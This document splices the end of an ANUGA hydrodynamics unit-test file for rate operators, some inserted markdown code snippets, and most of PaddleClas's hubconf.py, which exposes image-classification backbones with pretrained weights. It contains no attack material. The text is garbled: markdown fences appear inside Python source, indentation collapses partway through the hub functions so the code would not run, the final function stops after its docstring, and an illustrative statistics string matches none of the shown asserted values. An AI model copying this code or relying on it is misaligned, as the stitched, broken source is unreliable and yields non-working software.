        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
        assert num.allclose(Q_ex, Q)
        assert num.allclose(domain.fractional_step_volume_integral,
                            ((d - 1.) * domain.areas[indices]).sum())

        # test timestepping_statistics
        stats = operator.timestepping_statistics()
        import re
        rr = re.findall(r"[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)

        assert num.allclose(float(rr[1]), 1.33333)
        assert num.allclose(float(rr[2]), 3.33333)
        assert num.allclose(float(rr[3]), 146.667)
    def test_rate_operator_rate_quantity(self):
        from anuga.config import rho_a, rho_w, eta_w
        from math import pi, cos, sin

        a = [0.0, 0.0]
        b = [0.0, 2.0]
        c = [2.0, 0.0]
        d = [0.0, 4.0]
        e = [2.0, 2.0]
        f = [4.0, 0.0]

        points = [a, b, c, d, e, f]
        # bac, bce, ecf, dbe
        vertices = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]

        domain = Domain(points, vertices)

        # Flat surface with 1m of water
        domain.set_quantity('elevation', 0.0)
        domain.set_quantity('stage', 1.0)
        domain.set_quantity('friction', 0.0)

        Br = Reflective_boundary(domain)
        domain.set_boundary({'exterior': Br})

        verbose = False
        if verbose:
            print(domain.quantities['elevation'].centroid_values)
            print(domain.quantities['stage'].centroid_values)
            print(domain.quantities['xmomentum'].centroid_values)
            print(domain.quantities['ymomentum'].centroid_values)

        # Apply operator to these triangles
        indices = [0, 1, 3]
        factor = 10.0

        from anuga import Quantity
        rate_Q = Quantity(domain)
        rate_Q.set_values(1.0)

        operator = Rate_operator(domain, rate=rate_Q, factor=factor,
                                 indices=indices)

        # Apply Operator
        domain.timestep = 2.0
        operator()

        rate = rate_Q.centroid_values[indices]
        t = operator.get_time()
        Q = operator.get_Q()
        rate = rate * factor
        Q_ex = num.sum(domain.areas[indices] * rate)
        d = operator.get_timestep() * rate + 1

        # print "d"
        # print d
        # print Q_ex
        # print Q

        stage_ex = num.array([1.0, 1.0, 1.0, 1.0])
        stage_ex[indices] = d

        verbose = False
        if verbose:
            print(domain.quantities['elevation'].centroid_values)
            print(domain.quantities['stage'].centroid_values)
            print(domain.quantities['xmomentum'].centroid_values)
            print(domain.quantities['ymomentum'].centroid_values)

        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
        assert num.allclose(Q_ex, Q)
        assert num.allclose(domain.fractional_step_volume_integral,
                            ((d - 1.) * domain.areas[indices]).sum())

        # test timestepping_statistics
        stats = operator.timestepping_statistics()
        import re
        rr = re.findall(r"[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)

        assert num.allclose(float(rr[1]), 1.0)
        assert num.allclose(float(rr[2]), 1.0)
        assert num.allclose(float(rr[3]), 60.0)
    def test_rate_operator_functions_empty_indices(self):
        from anuga.config import rho_a, rho_w, eta_w
        from math import pi, cos, sin

        a = [0.0, 0.0]
        b = [0.0, 2.0]
        c = [2.0, 0.0]
        d = [0.0, 4.0]
        e = [2.0, 2.0]
        f = [4.0, 0.0]

        points = [a, b, c, d, e, f]
        # bac, bce, ecf, dbe
        vertices = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]

        domain = Domain(points, vertices)

        # Flat surface with 1m of water
        domain.set_quantity('elevation', 0.0)
        domain.set_quantity('stage', 1.0)
        domain.set_quantity('friction', 0.0)

        Br = Reflective_boundary(domain)
        domain.set_boundary({'exterior': Br})

        verbose = False
        if verbose:
            print(domain.quantities['elevation'].centroid_values)
            print(domain.quantities['stage'].centroid_values)
            print(domain.quantities['xmomentum'].centroid_values)
            print(domain.quantities['ymomentum'].centroid_values)

        # Apply operator to these triangles
        indices = []
        factor = 10.0

        def main_spatial_rate(x, y, t):
            # x and y should be an n by 1 array
            return x + y

        default_rate = 0.0

        domain.tri_full_flag[0] = 0

        operator = Rate_operator(domain, rate=main_spatial_rate, factor=factor,
                                 indices=indices, default_rate=default_rate)

        # Apply Operator
        domain.timestep = 2.0
        operator()

        t = operator.get_time()
        Q = operator.get_Q()
        x = operator.coord_c[indices, 0]
        y = operator.coord_c[indices, 1]
        rate = main_spatial_rate(x, y, t) * factor
        Q_ex = num.sum(domain.areas[indices] * rate)
        d = operator.get_timestep() * rate + 1

        # print Q_ex, Q
        # print indices
        # print "d"
        # print d

        stage_ex = num.array([1.0, 1.0, 1.0, 1.0])
        stage_ex[indices] = d

        if verbose:
            print(domain.quantities['elevation'].centroid_values)
            print(domain.quantities['stage'].centroid_values)
            print(domain.quantities['xmomentum'].centroid_values)
            print(domain.quantities['ymomentum'].centroid_values)

        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
        assert num.allclose(Q_ex, Q)
        assert num.allclose(domain.fractional_step_volume_integral,
                            ((d - 1.) * domain.areas[indices]).sum())

        # test timestepping_statistics
        stats = operator.timestepping_statistics()
        import re
        rr = re.findall(r"[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)

        assert num.allclose(float(rr[1]), 0.0)
        assert num.allclose(float(rr[2]), 0.0)
        assert num.allclose(float(rr[3]), 0.0)
    def test_rate_operator_functions_empty_region(self):
        from anuga.config import rho_a, rho_w, eta_w
        from math import pi, cos, sin

        a = [0.0, 0.0]
        b = [0.0, 2.0]
        c = [2.0, 0.0]
        d = [0.0, 4.0]
        e = [2.0, 2.0]
        f = [4.0, 0.0]

        points = [a, b, c, d, e, f]
        # bac, bce, ecf, dbe
        vertices = [[1, 0, 2], [1, 2, 4], [4, 2, 5], [3, 1, 4]]

        domain = Domain(points, vertices)

        # Flat surface with 1m of water
        domain.set_quantity('elevation', 0.0)
        domain.set_quantity('stage', 1.0)
        domain.set_quantity('friction', 0.0)

        Br = Reflective_boundary(domain)
        domain.set_boundary({'exterior': Br})

        verbose = False
        if verbose:
            print(domain.quantities['elevation'].centroid_values)
            print(domain.quantities['stage'].centroid_values)
            print(domain.quantities['xmomentum'].centroid_values)
            print(domain.quantities['ymomentum'].centroid_values)

        # Apply operator to these triangles
        indices = []
        region = anuga.Region(domain, indices=indices)
        factor = 10.0

        def main_spatial_rate(x, y, t):
            # x and y should be an n by 1 array
            return x + y

        default_rate = 0.0

        domain.tri_full_flag[0] = 0

        operator = Rate_operator(domain, rate=main_spatial_rate, factor=factor,
                                 region=region, default_rate=default_rate)

        # Apply Operator
        domain.timestep = 2.0
        operator()

        t = operator.get_time()
        Q = operator.get_Q()
        x = operator.coord_c[indices, 0]
        y = operator.coord_c[indices, 1]
        rate = main_spatial_rate(x, y, t) * factor
        Q_ex = num.sum(domain.areas[indices] * rate)
        d = operator.get_timestep() * rate + 1

        # print Q_ex, Q
        # print indices
        # print "d"
        # print d

        stage_ex = num.array([1.0, 1.0, 1.0, 1.0])
        stage_ex[indices] = d

        if verbose:
            print(domain.quantities['elevation'].centroid_values)
            print(domain.quantities['stage'].centroid_values)
            print(domain.quantities['xmomentum'].centroid_values)
            print(domain.quantities['ymomentum'].centroid_values)

        assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
        assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
        assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
        assert num.allclose(Q_ex, Q)
        assert num.allclose(domain.fractional_step_volume_integral,
                            ((d - 1.) * domain.areas[indices]).sum())

        # test timestepping_statistics
        stats = operator.timestepping_statistics()
        import re
        rr = re.findall(r"[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)

        assert num.allclose(float(rr[1]), 0.0)
        assert num.allclose(float(rr[2]), 0.0)
        assert num.allclose(float(rr[3]), 0.0)
if __name__ == "__main__":
    suite = unittest.makeSuite(Test_rate_operators,
                               'test_rate_operator_functions_rate_default_rate')
    runner = unittest.TextTestRunner(verbosity=1)
    runner.run(suite)
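# The statistics assertions throughout these tests reuse one numeric-extraction
# regex. The snippet below is a standalone sanity check of that pattern; the
# sample string is modelled on the comment in
# test_rate_operator_functions_spatial and is illustrative only.

```python
import re

# Pattern used by the tests above: optional sign, optional leading dot,
# digits, optional thousands groups, optional fraction and exponent.
NUM = r"[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?"

stats = "operator_5: Min rate = 1.33333 m/s, Max rate = 3.33333 m/s, Total Q = 213.333 m^3/s"
rr = re.findall(NUM, stats)

# rr[0] picks up the '5' in 'operator_5', which is why the tests
# index the extracted values from rr[1] onwards.
print(rr[1], rr[2], rr[3])  # 1.33333 3.33333 213.333
```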
# hubconf.py (zhusonghe/PaddleClas-1, Apache-2.0)

# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
dependencies = ['paddle']
import paddle
import os
import sys
class _SysPathG(object):
    """
    _SysPathG is used to add/clean a path on sys.path, making sure only minimal
    package dependencies are picked up by skipping parent dirs.

    __enter__
        add path into sys.path
    __exit__
        clean user's sys.path to avoid unexpected behaviors
    """

    def __init__(self, path):
        self.path = path

    def __enter__(self, ):
        sys.path.insert(0, self.path)

    def __exit__(self, type, value, traceback):
        _p = sys.path.pop(0)
        assert _p == self.path, 'Make sure sys.path cleaning {} correctly.'.format(
            self.path)
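# A standalone sketch of the guard pattern _SysPathG implements: prepend a
# path on entry, pop and verify it on exit. The PathGuard name and the example
# path are illustrative, not part of this module.

```python
import sys

class PathGuard:
    # Same idea as _SysPathG: prepend a path, pop and verify it on exit.
    def __init__(self, path):
        self.path = path

    def __enter__(self):
        sys.path.insert(0, self.path)

    def __exit__(self, exc_type, exc, tb):
        popped = sys.path.pop(0)
        assert popped == self.path, 'sys.path was modified inside the block'

before = list(sys.path)
with PathGuard("/tmp/example_pkgs"):
    assert sys.path[0] == "/tmp/example_pkgs"
assert sys.path == before  # sys.path restored exactly
```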
with _SysPathG(os.path.dirname(os.path.abspath(__file__)), ):
    import ppcls
    import ppcls.arch.backbone as backbone

    def ppclas_init():
        if ppcls.utils.logger._logger is None:
            ppcls.utils.logger.init_logger()

    ppclas_init()
    def _load_pretrained_parameters(model, name):
        url = 'https://paddle-imagenet-models-name.bj.bcebos.com/dygraph/{}_pretrained.pdparams'.format(
            name)
        path = paddle.utils.download.get_weights_path_from_url(url)
        model.set_state_dict(paddle.load(path))
        return model
    def alexnet(pretrained=False, **kwargs):
        """
        AlexNet
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `AlexNet` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.AlexNet(**kwargs)
        return model

    def vgg11(pretrained=False, **kwargs):
        """
        VGG11
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
                stop_grad_layers: int=0. Parameters in blocks whose index is larger than `stop_grad_layers` will be set `param.trainable=False`.
        Returns:
            model: nn.Layer. Specific `VGG11` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.VGG11(**kwargs)
        return model

    def vgg13(pretrained=False, **kwargs):
        """
        VGG13
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
                stop_grad_layers: int=0. Parameters in blocks whose index is larger than `stop_grad_layers` will be set `param.trainable=False`.
        Returns:
            model: nn.Layer. Specific `VGG13` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.VGG13(**kwargs)
        return model

    def vgg16(pretrained=False, **kwargs):
        """
        VGG16
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
                stop_grad_layers: int=0. Parameters in blocks whose index is larger than `stop_grad_layers` will be set `param.trainable=False`.
        Returns:
            model: nn.Layer. Specific `VGG16` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.VGG16(**kwargs)
        return model

    def vgg19(pretrained=False, **kwargs):
        """
        VGG19
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
                stop_grad_layers: int=0. Parameters in blocks whose index is larger than `stop_grad_layers` will be set `param.trainable=False`.
        Returns:
            model: nn.Layer. Specific `VGG19` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.VGG19(**kwargs)
        return model

    def resnet18(pretrained=False, **kwargs):
        """
        ResNet18
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
                input_image_channel: int=3. The number of input image channels.
                data_format: str='NCHW'. The data format of batch input images, should be in ('NCHW', 'NHWC').
        Returns:
            model: nn.Layer. Specific `ResNet18` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.ResNet18(**kwargs)
        return model

    def resnet34(pretrained=False, **kwargs):
        """
        ResNet34
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
                input_image_channel: int=3. The number of input image channels.
                data_format: str='NCHW'. The data format of batch input images, should be in ('NCHW', 'NHWC').
        Returns:
            model: nn.Layer. Specific `ResNet34` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.ResNet34(**kwargs)
        return model

    def resnet50(pretrained=False, **kwargs):
        """
        ResNet50
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
                input_image_channel: int=3. The number of input image channels.
                data_format: str='NCHW'. The data format of batch input images, should be in ('NCHW', 'NHWC').
        Returns:
            model: nn.Layer. Specific `ResNet50` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.ResNet50(**kwargs)
        return model

    def resnet101(pretrained=False, **kwargs):
        """
        ResNet101
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
                input_image_channel: int=3. The number of input image channels.
                data_format: str='NCHW'. The data format of batch input images, should be in ('NCHW', 'NHWC').
        Returns:
            model: nn.Layer. Specific `ResNet101` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.ResNet101(**kwargs)
        return model

    def resnet152(pretrained=False, **kwargs):
        """
        ResNet152
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
                input_image_channel: int=3. The number of input image channels.
                data_format: str='NCHW'. The data format of batch input images, should be in ('NCHW', 'NHWC').
        Returns:
            model: nn.Layer. Specific `ResNet152` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.ResNet152(**kwargs)
        return model
    def squeezenet1_0(pretrained=False, **kwargs):
        """
        SqueezeNet1_0
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `SqueezeNet1_0` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.SqueezeNet1_0(**kwargs)
        return model

    def squeezenet1_1(pretrained=False, **kwargs):
        """
        SqueezeNet1_1
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `SqueezeNet1_1` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.SqueezeNet1_1(**kwargs)
        return model

    def densenet121(pretrained=False, **kwargs):
        """
        DenseNet121
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
                dropout: float=0. Probability of setting units to zero.
                bn_size: int=4. The number of channels per group.
        Returns:
            model: nn.Layer. Specific `DenseNet121` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.DenseNet121(**kwargs)
        return model

    def densenet161(pretrained=False, **kwargs):
        """
        DenseNet161
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
                dropout: float=0. Probability of setting units to zero.
                bn_size: int=4. The number of channels per group.
        Returns:
            model: nn.Layer. Specific `DenseNet161` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.DenseNet161(**kwargs)
        return model

    def densenet169(pretrained=False, **kwargs):
        """
        DenseNet169
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
                dropout: float=0. Probability of setting units to zero.
                bn_size: int=4. The number of channels per group.
        Returns:
            model: nn.Layer. Specific `DenseNet169` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.DenseNet169(**kwargs)
        return model

    def densenet201(pretrained=False, **kwargs):
        """
        DenseNet201
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
                dropout: float=0. Probability of setting units to zero.
                bn_size: int=4. The number of channels per group.
        Returns:
            model: nn.Layer. Specific `DenseNet201` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.DenseNet201(**kwargs)
        return model

    def densenet264(pretrained=False, **kwargs):
        """
        DenseNet264
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
                dropout: float=0. Probability of setting units to zero.
                bn_size: int=4. The number of channels per group.
        Returns:
            model: nn.Layer. Specific `DenseNet264` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.DenseNet264(**kwargs)
        return model

    def inceptionv3(pretrained=False, **kwargs):
        """
        InceptionV3
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `InceptionV3` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.InceptionV3(**kwargs)
        return model

    def inceptionv4(pretrained=False, **kwargs):
        """
        InceptionV4
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `InceptionV4` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.InceptionV4(**kwargs)
        return model

    def googlenet(pretrained=False, **kwargs):
        """
        GoogLeNet
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `GoogLeNet` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.GoogLeNet(**kwargs)
        return model
    def shufflenetv2_x0_25(pretrained=False, **kwargs):
        """
        ShuffleNetV2_x0_25
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `ShuffleNetV2_x0_25` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.ShuffleNetV2_x0_25(**kwargs)
        return model

    def mobilenetv1(pretrained=False, **kwargs):
        """
        MobileNetV1
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `MobileNetV1` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.MobileNetV1(**kwargs)
        return model

    def mobilenetv1_x0_25(pretrained=False, **kwargs):
        """
        MobileNetV1_x0_25
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `MobileNetV1_x0_25` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.MobileNetV1_x0_25(**kwargs)
        return model

    def mobilenetv1_x0_5(pretrained=False, **kwargs):
        """
        MobileNetV1_x0_5
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `MobileNetV1_x0_5` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.MobileNetV1_x0_5(**kwargs)
        return model

    def mobilenetv1_x0_75(pretrained=False, **kwargs):
        """
        MobileNetV1_x0_75
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `MobileNetV1_x0_75` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.MobileNetV1_x0_75(**kwargs)
        return model

    def mobilenetv2_x0_25(pretrained=False, **kwargs):
        """
        MobileNetV2_x0_25
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `MobileNetV2_x0_25` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.MobileNetV2_x0_25(**kwargs)
        return model

    def mobilenetv2_x0_5(pretrained=False, **kwargs):
        """
        MobileNetV2_x0_5
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `MobileNetV2_x0_5` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.MobileNetV2_x0_5(**kwargs)
        return model

    def mobilenetv2_x0_75(pretrained=False, **kwargs):
        """
        MobileNetV2_x0_75
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `MobileNetV2_x0_75` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.MobileNetV2_x0_75(**kwargs)
        return model

    def mobilenetv2_x1_5(pretrained=False, **kwargs):
        """
        MobileNetV2_x1_5
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `MobileNetV2_x1_5` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.MobileNetV2_x1_5(**kwargs)
        return model

    def mobilenetv2_x2_0(pretrained=False, **kwargs):
        """
        MobileNetV2_x2_0
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `MobileNetV2_x2_0` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.MobileNetV2_x2_0(**kwargs)
        return model
    def mobilenetv3_large_x0_35(pretrained=False, **kwargs):
        """
        MobileNetV3_large_x0_35
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `MobileNetV3_large_x0_35` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.MobileNetV3_large_x0_35(**kwargs)
        return model

    def mobilenetv3_large_x0_5(pretrained=False, **kwargs):
        """
        MobileNetV3_large_x0_5
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `MobileNetV3_large_x0_5` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.MobileNetV3_large_x0_5(**kwargs)
        return model

    def mobilenetv3_large_x0_75(pretrained=False, **kwargs):
        """
        MobileNetV3_large_x0_75
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `MobileNetV3_large_x0_75` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.MobileNetV3_large_x0_75(**kwargs)
        return model

    def mobilenetv3_large_x1_0(pretrained=False, **kwargs):
        """
        MobileNetV3_large_x1_0
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `MobileNetV3_large_x1_0` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.MobileNetV3_large_x1_0(**kwargs)
        return model

    def mobilenetv3_large_x1_25(pretrained=False, **kwargs):
        """
        MobileNetV3_large_x1_25
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `MobileNetV3_large_x1_25` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.MobileNetV3_large_x1_25(**kwargs)
        return model

    def mobilenetv3_small_x0_35(pretrained=False, **kwargs):
        """
        MobileNetV3_small_x0_35
        Args:
            pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
            kwargs:
                class_dim: int=1000. Output dim of last fc layer.
        Returns:
            model: nn.Layer. Specific `MobileNetV3_small_x0_35` model depends on args.
        """
        kwargs.update({'pretrained': pretrained})
        model = backbone.MobileNetV3_small_x0_35(**kwargs)
        return model

    def mobilenetv3_small_x0_5(pretrained=False, **kwargs):
        """
MobileNetV3_small_x0_5
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV3_small_x0_5` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV3_small_x0_5(**kwargs)
return model
def mobilenetv3_small_x0_75(pretrained=False, **kwargs):
"""
MobileNetV3_small_x0_75
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV3_small_x0_75` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV3_small_x0_75(**kwargs)
return model
def mobilenetv3_small_x1_0(pretrained=False, **kwargs):
"""
MobileNetV3_small_x1_0
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV3_small_x1_0` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV3_small_x1_0(**kwargs)
return model
def mobilenetv3_small_x1_25(pretrained=False, **kwargs):
"""
MobileNetV3_small_x1_25
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `MobileNetV3_small_x1_25` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.MobileNetV3_small_x1_25(**kwargs)
return model
def resnext101_32x4d(pretrained=False, **kwargs):
"""
ResNeXt101_32x4d
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `ResNeXt101_32x4d` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.ResNeXt101_32x4d(**kwargs)
return model
def resnext101_64x4d(pretrained=False, **kwargs):
"""
ResNeXt101_64x4d
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `ResNeXt101_64x4d` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.ResNeXt101_64x4d(**kwargs)
return model
def resnext152_32x4d(pretrained=False, **kwargs):
"""
ResNeXt152_32x4d
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `ResNeXt152_32x4d` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.ResNeXt152_32x4d(**kwargs)
return model
def resnext152_64x4d(pretrained=False, **kwargs):
"""
ResNeXt152_64x4d
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `ResNeXt152_64x4d` model depends on args.
"""
kwargs.update({'pretrained': pretrained})
model = backbone.ResNeXt152_64x4d(**kwargs)
return model
def resnext50_32x4d(pretrained=False, **kwargs):
"""
ResNeXt50_32x4d
Args:
pretrained: bool=False. If `True` load pretrained parameters, `False` otherwise.
kwargs:
class_dim: int=1000. Output dim of last fc layer.
Returns:
model: nn.Layer. Specific `ResNeXt50_32x4d` model depends on args.
"""
